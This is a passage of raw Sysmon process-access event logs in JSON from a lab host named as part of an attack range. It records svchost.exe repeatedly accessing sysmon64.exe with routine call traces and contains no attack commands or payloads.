05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1377,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1378,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1379,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1380,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1381,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1382,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1383,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1384,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 